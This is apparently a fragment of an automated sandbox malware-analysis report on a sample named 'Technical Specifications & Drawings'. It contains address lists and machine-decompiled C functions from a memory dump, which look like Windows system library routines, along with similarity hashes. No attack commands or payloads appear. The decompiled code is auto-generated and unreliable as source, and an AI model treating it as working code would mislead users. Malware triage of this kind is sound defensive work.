                                                  0x00000000
                                                  0x017d26b8
                                                  0x017d26b8
                                                  0x017d26ba
                                                  0x017d27a6
                                                  0x017d27a6
                                                  0x017d27a9
                                                  0x017d27ab
                                                  0x017d27b9
                                                  0x017d27b9
                                                  0x017d27be
                                                  0x017d27c1
                                                  0x017d27c3
                                                  0x017d27c5
                                                  0x017d27c7
                                                  0x01815c74
                                                  0x01815c79
                                                  0x01815c79
                                                  0x017d27c7
                                                  0x00000000
                                                  0x017d26c0
                                                  0x017d26c0
                                                  0x017d26c3
                                                  0x017d26c6
                                                  0x017d26c6
                                                  0x017d26c9
                                                  0x017d26c9
                                                  0x00000000
                                                  0x017d26c9
                                                  0x017d26ba
                                                  0x017d265b
                                                  0x017d265b
                                                  0x017d265e
                                                  0x017d2667
                                                  0x017d266d
                                                  0x017d2677
                                                  0x017d267c
                                                  0x017d267f
                                                  0x017d2681
                                                  0x01815b49
                                                  0x01815b4e
                                                  0x017d27cd
                                                  0x017d27d0
                                                  0x017d27d1
                                                  0x017d27d2
                                                  0x017d27d4
                                                  0x017d27dd
                                                  0x017d2687
                                                  0x017d2687
                                                  0x017d268a
                                                  0x017d268b
                                                  0x017d268e
                                                  0x017d268f
                                                  0x017d2691
                                                  0x017d2696
                                                  0x017d2698
                                                  0x017d269d
                                                  0x017d269f
                                                  0x00000000
                                                  0x017d269f
                                                  0x017d2681
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2846
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2605
                                                  0x017d260a
                                                  0x017d260c
                                                  0x017d2611
                                                  0x017d2616
                                                  0x017d2619
                                                  0x017d2619
                                                  0x017d261e
                                                  0x00000000
                                                  0x017d2624
                                                  0x017d2627
                                                  0x017d2627
                                                  0x00000000
                                                  0x00000000
                                                  0x01815b1f
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2894
                                                  0x017d289b
                                                  0x017d289d
                                                  0x017d28a1
                                                  0x01815b2b
                                                  0x01815b2e
                                                  0x01815b2e
                                                  0x017d28a7
                                                  0x017d28a9
                                                  0x01815b04
                                                  0x01815b09
                                                  0x01815b09
                                                  0x01815b09
                                                  0x00000000
                                                  0x00000000
                                                  0x01815b35
                                                  0x01815b3c
                                                  0x017d28fb
                                                  0x017d28fb
                                                  0x017d26cc
                                                  0x017d26cc
                                                  0x017d26d0
                                                  0x00000000
                                                  0x017d26d2
                                                  0x017d26d2
                                                  0x00000000
                                                  0x017d26d2
                                                  0x00000000
                                                  0x00000000
                                                  0x017d25fe
                                                  0x017d292d
                                                  0x017d292f
                                                  0x017d2930
                                                  0x017d2935
                                                  0x017d2937
                                                  0x017d2939
                                                  0x017d2939
                                                  0x017d293a
                                                  0x017d293a
                                                  0x017d293a
                                                  0x017d293d
                                                  0x017d293f
                                                  0x017d2941
                                                  0x017d2941
                                                  0x017d2942
                                                  0x017d2945
                                                  0x017d2945
                                                  0x017d2945
                                                  0x017d2946
                                                  0x017d294e
                                                  0x017d294f
                                                  0x017d295a
                                                  0x017d295d
                                                  0x017d2960
                                                  0x017d2960
                                                  0x017d2962
                                                  0x017d2963
                                                  0x017d2965
                                                  0x017d2965
                                                  0x017d2966
                                                  0x017d2969
                                                  0x017d296a
                                                  0x017d296a
                                                  0x017d296a
                                                  0x017d296e
                                                  0x017d296f
                                                  0x017d2971
                                                  0x017d2971
                                                  0x017d2972
                                                  0x017d2973
                                                  0x017d297b
                                                  0x017d2981
                                                  0x017d2982
                                                  0x017d2983
                                                  0x017d2984
                                                  0x017d2985
                                                  0x017d2986
                                                  0x017d2987
                                                  0x017d2988
                                                  0x017d2989
                                                  0x017d298a
                                                  0x017d298b
                                                  0x017d298c
                                                  0x017d298d
                                                  0x017d298e
                                                  0x017d298f
                                                  0x017d2990
                                                  0x017d2992
                                                  0x017d2997
                                                  0x017d29a3
                                                  0x017d29a6
                                                  0x017d29ab
                                                  0x017d29ad
                                                  0x017d29b0
                                                  0x017d29b2
                                                  0x01815c80
                                                  0x017d29b8
                                                  0x017d29b8
                                                  0x017d29bb
                                                  0x017d29c0
                                                  0x017d29c5
                                                  0x017d29c6
                                                  0x017d29c6
                                                  0x017d29c9
                                                  0x017d29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x017d29cd
                                                  0x017d29d0
                                                  0x017d29d9
                                                  0x017d29db
                                                  0x017d29dd
                                                  0x017d2a7f
                                                  0x017d2a84
                                                  0x017d2a87
                                                  0x017d2a89
                                                  0x01815ca1
                                                  0x01815ca3
                                                  0x00000000
                                                  0x017d2a8f
                                                  0x017d2a8f
                                                  0x00000000
                                                  0x017d2a8f
                                                  0x00000000
                                                  0x017d29e3
                                                  0x017d29e3
                                                  0x017d29e3
                                                  0x00000000
                                                  0x017d29e3
                                                  0x017d29dd
                                                  0x00000000
                                                  0x017d29db
                                                  0x017d29e6
                                                  0x017d29e9
                                                  0x017d29eb
                                                  0x017d29ed
                                                  0x017d29f3
                                                  0x017d29f5
                                                  0x017d29f8
                                                  0x017d29fa
                                                  0x017d2a97
                                                  0x017d2a9a
                                                  0x017d2a9d
                                                  0x017d2add
                                                  0x00000000
                                                  0x017d2a9f
                                                  0x017d2aa2
                                                  0x017d2aa5
                                                  0x017d2aa8
                                                  0x017d2aab
                                                  0x01815cab
                                                  0x01815caf
                                                  0x01815cc5
                                                  0x01815cda
                                                  0x01815cdc
                                                  0x01815cdf
                                                  0x01815ce5
                                                  0x00000000
                                                  0x01815ceb
                                                  0x01815ced
                                                  0x01815cee
                                                  0x00000000
                                                  0x01815cee
                                                  0x01815cb1
                                                  0x01815cb4
                                                  0x01815cb9
                                                  0x01815cbb
                                                  0x00000000
                                                  0x01815cbd
                                                  0x01815cbd
                                                  0x00000000
                                                  0x01815cbd
                                                  0x01815cbb
                                                  0x017d2ab1
                                                  0x017d2ab1
                                                  0x017d2ac4
                                                  0x017d2ac6
                                                  0x017d2ac6
                                                  0x00000000
                                                  0x017d2ac6
                                                  0x017d2aab
                                                  0x00000000
                                                  0x017d2a00
                                                  0x017d2a09
                                                  0x017d2a0e
                                                  0x017d2a21
                                                  0x017d2a24
                                                  0x017d2a35
                                                  0x017d2a3a
                                                  0x017d2a3d
                                                  0x017d2a42
                                                  0x017d2a59
                                                  0x017d2a59
                                                  0x017d2a5c
                                                  0x017d2a5f
                                                  0x017d2a5f
                                                  0x017d29fa
                                                  0x017d29f3
                                                  0x017d2a64
                                                  0x017d2a64
                                                  0x017d2a6b
                                                  0x017d2a6b
                                                  0x017d2a6d
                                                  0x017d2a72
                                                  0x017d2a72
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PATH
                                                  • API String ID: 0-1036084923
                                                  • Opcode ID: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                  • Instruction ID: 5a18848d7f91d089aee092e52c51c95eb478b9601902d3173c8e19f5b8f945c7
                                                  • Opcode Fuzzy Hash: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                  • Instruction Fuzzy Hash: 78C19E71E0021ADBDB25DFA9D880BAEFBB5FF49710F194029E901FB255D734A942CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 42%
                                                  			E017AC962(intOrPtr __ecx) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t19;
                                                  				intOrPtr _t22;
                                                  				void* _t26;
                                                  				void* _t27;
                                                  				void* _t32;
                                                  				intOrPtr _t34;
                                                  				void* _t35;
                                                  				void* _t37;
                                                  				intOrPtr* _t38;
                                                  				signed int _t39;
                                                  
                                                  				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                  				_v8 =  *0x189d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                  				_t34 = __ecx;
                                                  				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                  					_t26 = 0;
                                                  					E017BEEF0(0x18970a0);
                                                  					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                  					if(E0182F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                  						L9:
                                                  						E017BEB70(_t29, 0x18970a0);
                                                  						_t19 = _t26;
                                                  						L2:
                                                  						_pop(_t35);
                                                  						_pop(_t37);
                                                  						_pop(_t27);
                                                  						return E017EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                  					}
                                                  					_t29 = _t34;
                                                  					_t26 = E0182F1FC(_t34, _t32);
                                                  					if(_t26 < 0) {
                                                  						goto L9;
                                                  					}
                                                  					_t38 =  *0x18970c0; // 0x0
                                                  					while(_t38 != 0x18970c0) {
                                                  						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                  						_t38 =  *_t38;
                                                  						_v12 = _t22;
                                                  						if(_t22 != 0) {
                                                  							_t29 = _t22;
                                                  							 *0x189b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                  							_v12();
                                                  						}
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				_t19 = 0;
                                                  				goto L2;
                                                  			}



















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cbc9b526742ac6c081a6e51c3cb0849b1368633d343be0d10e00932f37b8079
                                                  • Instruction ID: 1632bb4b7e3c47c741e4ce0cf0629997396d61ec8ca25841e3c6cf53d58951ff
                                                  • Opcode Fuzzy Hash: 8cbc9b526742ac6c081a6e51c3cb0849b1368633d343be0d10e00932f37b8079
                                                  • Instruction Fuzzy Hash: 1011E5323106069BCB21AF2CDC89A6BBBE9FB84710B54052DF945C3655DF20EE50CBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E017DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                  				char _v5;
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				char _v16;
                                                  				char _v17;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				signed int _v40;
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				void* __ebp;
                                                  				signed int _t73;
                                                  				intOrPtr* _t75;
                                                  				signed int _t77;
                                                  				signed int _t79;
                                                  				signed int _t81;
                                                  				intOrPtr _t83;
                                                  				intOrPtr _t85;
                                                  				intOrPtr _t86;
                                                  				signed int _t91;
                                                  				signed int _t94;
                                                  				signed int _t95;
                                                  				signed int _t96;
                                                  				signed int _t106;
                                                  				signed int _t108;
                                                  				signed int _t114;
                                                  				signed int _t116;
                                                  				signed int _t118;
                                                  				signed int _t122;
                                                  				signed int _t123;
                                                  				void* _t129;
                                                  				signed int _t130;
                                                  				void* _t132;
                                                  				intOrPtr* _t134;
                                                  				signed int _t138;
                                                  				signed int _t141;
                                                  				signed int _t147;
                                                  				intOrPtr _t153;
                                                  				signed int _t154;
                                                  				signed int _t155;
                                                  				signed int _t170;
                                                  				void* _t174;
                                                  				signed int _t176;
                                                  				signed int _t177;
                                                  
                                                  				_t129 = __ebx;
                                                  				_push(_t132);
                                                  				_push(__esi);
                                                  				_t174 = _t132;
                                                  				_t73 =  !( *( *(_t174 + 0x18)));
                                                  				if(_t73 >= 0) {
                                                  					L5:
                                                  					return _t73;
                                                  				} else {
                                                  					E017BEEF0(0x1897b60);
                                                  					_t134 =  *0x1897b84; // 0x77577b80
                                                  					_t2 = _t174 + 0x24; // 0x24
                                                  					_t75 = _t2;
                                                  					if( *_t134 != 0x1897b80) {
                                                  						_push(3);
                                                  						asm("int 0x29");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						_push(0x1897b60);
                                                  						_t170 = _v8;
                                                  						_v28 = 0;
                                                  						_v40 = 0;
                                                  						_v24 = 0;
                                                  						_v17 = 0;
                                                  						_v32 = 0;
                                                  						__eflags = _t170 & 0xffff7cf2;
                                                  						if((_t170 & 0xffff7cf2) != 0) {
                                                  							L43:
                                                  							_t77 = 0xc000000d;
                                                  						} else {
                                                  							_t79 = _t170 & 0x0000000c;
                                                  							__eflags = _t79;
                                                  							if(_t79 != 0) {
                                                  								__eflags = _t79 - 0xc;
                                                  								if(_t79 == 0xc) {
                                                  									goto L43;
                                                  								} else {
                                                  									goto L9;
                                                  								}
                                                  							} else {
                                                  								_t170 = _t170 | 0x00000008;
                                                  								__eflags = _t170;
                                                  								L9:
                                                  								_t81 = _t170 & 0x00000300;
                                                  								__eflags = _t81 - 0x300;
                                                  								if(_t81 == 0x300) {
                                                  									goto L43;
                                                  								} else {
                                                  									_t138 = _t170 & 0x00000001;
                                                  									__eflags = _t138;
                                                  									_v24 = _t138;
                                                  									if(_t138 != 0) {
                                                  										__eflags = _t81;
                                                  										if(_t81 != 0) {
                                                  											goto L43;
                                                  										} else {
                                                  											goto L11;
                                                  										}
                                                  									} else {
                                                  										L11:
                                                  										_push(_t129);
                                                  										_t77 = E017B6D90( &_v20);
                                                  										_t130 = _t77;
                                                  										__eflags = _t130;
                                                  										if(_t130 >= 0) {
                                                  											_push(_t174);
                                                  											__eflags = _t170 & 0x00000301;
                                                  											if((_t170 & 0x00000301) == 0) {
                                                  												_t176 = _a8;
                                                  												__eflags = _t176;
                                                  												if(__eflags == 0) {
                                                  													L64:
                                                  													_t83 =  *[fs:0x18];
                                                  													_t177 = 0;
                                                  													__eflags =  *(_t83 + 0xfb8);
                                                  													if( *(_t83 + 0xfb8) != 0) {
                                                  														E017B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                  														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                  													}
                                                  													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                  													goto L15;
                                                  												} else {
                                                  													asm("sbb edx, edx");
                                                  													_t114 = E01848938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                  													__eflags = _t114;
                                                  													if(_t114 < 0) {
                                                  														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                  														E017AB150();
                                                  													}
                                                  													_t116 = E01846D81(_t176,  &_v16);
                                                  													__eflags = _t116;
                                                  													if(_t116 >= 0) {
                                                  														__eflags = _v16 - 2;
                                                  														if(_v16 < 2) {
                                                  															L56:
                                                  															_t118 = E017B75CE(_v20, 5, 0);
                                                  															__eflags = _t118;
                                                  															if(_t118 < 0) {
                                                  																L67:
                                                  																_t130 = 0xc0000017;
                                                  																goto L32;
                                                  															} else {
                                                  																__eflags = _v12;
                                                  																if(_v12 == 0) {
                                                  																	goto L67;
                                                  																} else {
                                                  																	_t153 =  *0x1898638; // 0x0
                                                  																	_t122 = L017B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                  																	_t154 = _v12;
                                                  																	_t130 = _t122;
                                                  																	__eflags = _t130;
                                                  																	if(_t130 >= 0) {
                                                  																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                  																		__eflags = _t123;
                                                  																		if(_t123 != 0) {
                                                  																			_t155 = _a12;
                                                  																			__eflags = _t155;
                                                  																			if(_t155 != 0) {
                                                  																				 *_t155 = _t123;
                                                  																			}
                                                  																			goto L64;
                                                  																		} else {
                                                  																			E017B76E2(_t154);
                                                  																			goto L41;
                                                  																		}
                                                  																	} else {
                                                  																		E017B76E2(_t154);
                                                  																		_t177 = 0;
                                                  																		goto L18;
                                                  																	}
                                                  																}
                                                  															}
                                                  														} else {
                                                  															__eflags =  *_t176;
                                                  															if( *_t176 != 0) {
                                                  																goto L56;
                                                  															} else {
                                                  																__eflags =  *(_t176 + 2);
                                                  																if( *(_t176 + 2) == 0) {
                                                  																	goto L64;
                                                  																} else {
                                                  																	goto L56;
                                                  																}
                                                  															}
                                                  														}
                                                  													} else {
                                                  														_t130 = 0xc000000d;
                                                  														goto L32;
                                                  													}
                                                  												}
                                                  												goto L35;
                                                  											} else {
                                                  												__eflags = _a8;
                                                  												if(_a8 != 0) {
                                                  													_t77 = 0xc000000d;
                                                  												} else {
                                                  													_v5 = 1;
                                                  													L017DFCE3(_v20, _t170);
                                                  													_t177 = 0;
                                                  													__eflags = 0;
                                                  													L15:
                                                  													_t85 =  *[fs:0x18];
                                                  													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                  													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                  														L18:
                                                  														__eflags = _t130;
                                                  														if(_t130 != 0) {
                                                  															goto L32;
                                                  														} else {
                                                  															__eflags = _v5 - _t130;
                                                  															if(_v5 == _t130) {
                                                  																goto L32;
                                                  															} else {
                                                  																_t86 =  *[fs:0x18];
                                                  																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                  																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                  																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                  																}
                                                  																__eflags = _t177;
                                                  																if(_t177 == 0) {
                                                  																	L31:
                                                  																	__eflags = 0;
                                                  																	L017B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                  																	goto L32;
                                                  																} else {
                                                  																	__eflags = _v24;
                                                  																	_t91 =  *(_t177 + 0x20);
                                                  																	if(_v24 != 0) {
                                                  																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                  																		goto L31;
                                                  																	} else {
                                                  																		_t141 = _t91 & 0x00000040;
                                                  																		__eflags = _t170 & 0x00000100;
                                                  																		if((_t170 & 0x00000100) == 0) {
                                                  																			__eflags = _t141;
                                                  																			if(_t141 == 0) {
                                                  																				L74:
                                                  																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                  																				goto L27;
                                                  																			} else {
                                                  																				_t177 = E017DFD22(_t177);
                                                  																				__eflags = _t177;
                                                  																				if(_t177 == 0) {
                                                  																					goto L42;
                                                  																				} else {
                                                  																					_t130 = E017DFD9B(_t177, 0, 4);
                                                  																					__eflags = _t130;
                                                  																					if(_t130 != 0) {
                                                  																						goto L42;
                                                  																					} else {
                                                  																						_t68 = _t177 + 0x20;
                                                  																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                  																						__eflags =  *_t68;
                                                  																						_t91 =  *(_t177 + 0x20);
                                                  																						goto L74;
                                                  																					}
                                                  																				}
                                                  																			}
                                                  																			goto L35;
                                                  																		} else {
                                                  																			__eflags = _t141;
                                                  																			if(_t141 != 0) {
                                                  																				_t177 = E017DFD22(_t177);
                                                  																				__eflags = _t177;
                                                  																				if(_t177 == 0) {
                                                  																					L42:
                                                  																					_t77 = 0xc0000001;
                                                  																					goto L33;
                                                  																				} else {
                                                  																					_t130 = E017DFD9B(_t177, 0, 4);
                                                  																					__eflags = _t130;
                                                  																					if(_t130 != 0) {
                                                  																						goto L42;
                                                  																					} else {
                                                  																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                  																						_t91 =  *(_t177 + 0x20);
                                                  																						goto L26;
                                                  																					}
                                                  																				}
                                                  																				goto L35;
                                                  																			} else {
                                                  																				L26:
                                                  																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                  																				__eflags = _t94;
                                                  																				L27:
                                                  																				 *(_t177 + 0x20) = _t94;
                                                  																				__eflags = _t170 & 0x00008000;
                                                  																				if((_t170 & 0x00008000) != 0) {
                                                  																					_t95 = _a12;
                                                  																					__eflags = _t95;
                                                  																					if(_t95 != 0) {
                                                  																						_t96 =  *_t95;
                                                  																						__eflags = _t96;
                                                  																						if(_t96 != 0) {
                                                  																							 *((short*)(_t177 + 0x22)) = 0;
                                                  																							_t40 = _t177 + 0x20;
                                                  																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                  																							__eflags =  *_t40;
                                                  																						}
                                                  																					}
                                                  																				}
                                                  																				goto L31;
                                                  																			}
                                                  																		}
                                                  																	}
                                                  																}
                                                  															}
                                                  														}
                                                  													} else {
                                                  														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                  														_t106 =  *(_t147 + 0x20);
                                                  														__eflags = _t106 & 0x00000040;
                                                  														if((_t106 & 0x00000040) != 0) {
                                                  															_t147 = E017DFD22(_t147);
                                                  															__eflags = _t147;
                                                  															if(_t147 == 0) {
                                                  																L41:
                                                  																_t130 = 0xc0000001;
                                                  																L32:
                                                  																_t77 = _t130;
                                                  																goto L33;
                                                  															} else {
                                                  																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                  																_t106 =  *(_t147 + 0x20);
                                                  																goto L17;
                                                  															}
                                                  															goto L35;
                                                  														} else {
                                                  															L17:
                                                  															_t108 = _t106 | 0x00000080;
                                                  															__eflags = _t108;
                                                  															 *(_t147 + 0x20) = _t108;
                                                  															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                  															goto L18;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  											L33:
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						L35:
                                                  						return _t77;
                                                  					} else {
                                                  						 *_t75 = 0x1897b80;
                                                  						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                  						 *_t134 = _t75;
                                                  						 *0x1897b84 = _t75;
                                                  						_t73 = E017BEB70(_t134, 0x1897b60);
                                                  						if( *0x1897b20 != 0) {
                                                  							_t73 =  *( *[fs:0x30] + 0xc);
                                                  							if( *((char*)(_t73 + 0x28)) == 0) {
                                                  								_t73 = E017BFF60( *0x1897b20);
                                                  							}
                                                  						}
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  			}


                                                  Strings
                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0181BE0F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                  • API String ID: 0-865735534
                                                  • Opcode ID: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                  • Instruction ID: d6b72d5b5bc22bd21ad891813ce1a59008c6536f717f1bdc5eb2faad4b6508ec
                                                  • Opcode Fuzzy Hash: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                  • Instruction Fuzzy Hash: 22A10872B0060A8BEB25DF68C4547BAF7B5AF48710F04456EE94BDB685DB30DA42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E017A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                  				signed char _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				signed int _v52;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr _t55;
                                                  				signed int _t57;
                                                  				signed int _t58;
                                                  				char* _t62;
                                                  				signed char* _t63;
                                                  				signed char* _t64;
                                                  				signed int _t67;
                                                  				signed int _t72;
                                                  				signed int _t77;
                                                  				signed int _t78;
                                                  				signed int _t88;
                                                  				intOrPtr _t89;
                                                  				signed char _t93;
                                                  				signed int _t97;
                                                  				signed int _t98;
                                                  				signed int _t102;
                                                  				signed int _t103;
                                                  				intOrPtr _t104;
                                                  				signed int _t105;
                                                  				signed int _t106;
                                                  				signed char _t109;
                                                  				signed int _t111;
                                                  				void* _t116;
                                                  
                                                  				_t102 = __edi;
                                                  				_t97 = __edx;
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t55 =  *[fs:0x18];
                                                  				_t109 = __ecx;
                                                  				_v8 = __edx;
                                                  				_t86 = 0;
                                                  				_v32 = _t55;
                                                  				_v24 = 0;
                                                  				_push(__edi);
                                                  				if(__ecx == 0x1895350) {
                                                  					_t86 = 1;
                                                  					_v24 = 1;
                                                  					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                  				}
                                                  				_t103 = _t102 | 0xffffffff;
                                                  				if( *0x1897bc8 != 0) {
                                                  					_push(0xc000004b);
                                                  					_push(_t103);
                                                  					E017E97C0();
                                                  				}
                                                  				if( *0x18979c4 != 0) {
                                                  					_t57 = 0;
                                                  				} else {
                                                  					_t57 = 0x18979c8;
                                                  				}
                                                  				_v16 = _t57;
                                                  				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                  					_t93 = _t109;
                                                  					L23();
                                                  				}
                                                  				_t58 =  *_t109;
                                                  				if(_t58 == _t103) {
                                                  					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                  					_t58 = _t103;
                                                  					if(__eflags == 0) {
                                                  						_t93 = _t109;
                                                  						E017D1624(_t86, __eflags);
                                                  						_t58 =  *_t109;
                                                  					}
                                                  				}
                                                  				_v20 = _v20 & 0x00000000;
                                                  				if(_t58 != _t103) {
                                                  					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                  				}
                                                  				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                  				_t88 = _v16;
                                                  				_v28 = _t104;
                                                  				L9:
                                                  				while(1) {
                                                  					if(E017C7D50() != 0) {
                                                  						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                  					} else {
                                                  						_t62 = 0x7ffe0382;
                                                  					}
                                                  					if( *_t62 != 0) {
                                                  						_t63 =  *[fs:0x30];
                                                  						__eflags = _t63[0x240] & 0x00000002;
                                                  						if((_t63[0x240] & 0x00000002) != 0) {
                                                  							_t93 = _t109;
                                                  							E0183FE87(_t93);
                                                  						}
                                                  					}
                                                  					if(_t104 != 0xffffffff) {
                                                  						_push(_t88);
                                                  						_push(0);
                                                  						_push(_t104);
                                                  						_t64 = E017E9520();
                                                  						goto L15;
                                                  					} else {
                                                  						while(1) {
                                                  							_t97 =  &_v8;
                                                  							_t64 = E017DE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                  							if(_t64 == 0x102) {
                                                  								break;
                                                  							}
                                                  							_t93 =  *(_t109 + 4);
                                                  							_v8 = _t93;
                                                  							if((_t93 & 0x00000002) != 0) {
                                                  								continue;
                                                  							}
                                                  							L15:
                                                  							if(_t64 == 0x102) {
                                                  								break;
                                                  							}
                                                  							_t89 = _v24;
                                                  							if(_t64 < 0) {
                                                  								E017FDF30(_t93, _t97, _t64);
                                                  								_push(_t93);
                                                  								_t98 = _t97 | 0xffffffff;
                                                  								__eflags =  *0x1896901;
                                                  								_push(_t109);
                                                  								_v52 = _t98;
                                                  								if( *0x1896901 != 0) {
                                                  									_push(0);
                                                  									_push(1);
                                                  									_push(0);
                                                  									_push(0x100003);
                                                  									_push( &_v12);
                                                  									_t72 = E017E9980();
                                                  									__eflags = _t72;
                                                  									if(_t72 < 0) {
                                                  										_v12 = _t98 | 0xffffffff;
                                                  									}
                                                  								}
                                                  								asm("lock cmpxchg [ecx], edx");
                                                  								_t111 = 0;
                                                  								__eflags = 0;
                                                  								if(0 != 0) {
                                                  									__eflags = _v12 - 0xffffffff;
                                                  									if(_v12 != 0xffffffff) {
                                                  										_push(_v12);
                                                  										E017E95D0();
                                                  									}
                                                  								} else {
                                                  									_t111 = _v12;
                                                  								}
                                                  								return _t111;
                                                  							} else {
                                                  								if(_t89 != 0) {
                                                  									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                  									_t77 = E017C7D50();
                                                  									__eflags = _t77;
                                                  									if(_t77 == 0) {
                                                  										_t64 = 0x7ffe0384;
                                                  									} else {
                                                  										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                  									}
                                                  									__eflags =  *_t64;
                                                  									if( *_t64 != 0) {
